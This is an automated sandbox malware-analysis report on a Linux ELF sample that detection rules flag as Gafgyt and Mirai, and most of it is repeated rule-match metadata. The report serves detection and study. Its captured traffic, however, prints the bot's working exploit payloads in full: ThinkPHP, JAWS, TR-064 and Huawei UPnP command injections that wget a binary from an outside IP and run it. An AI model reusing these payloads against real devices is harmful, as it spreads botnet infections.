      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
      Source: unknownHTTP traffic detected: POST /UD/act?1 HTTP/1.1Host: 127.0.0.1:7547User-Agent: Messiah/2.0SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServersContent-Type: text/xmlContent-Length: 526<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:EnvelopeData Raw: Data Ascii:
      Source: debug.dbg.elfString found in binary or memory: http://198.12.107.126/YourName/BinName.arm7;chmod
      Source: debug.dbg.elfString found in binary or memory: http://198.12.107.126/YourName/BinName.mips;
      Source: debug.dbg.elfString found in binary or memory: http://198.12.107.126/YourName/BinName.x86
      Source: debug.dbg.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: debug.dbg.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

      System Summary

      barindex
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
      Source: 5434.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: Process Memory Space: debug.dbg.elf PID: 5431, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: debug.dbg.elf PID: 5434, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: debug.dbg.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 5431.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
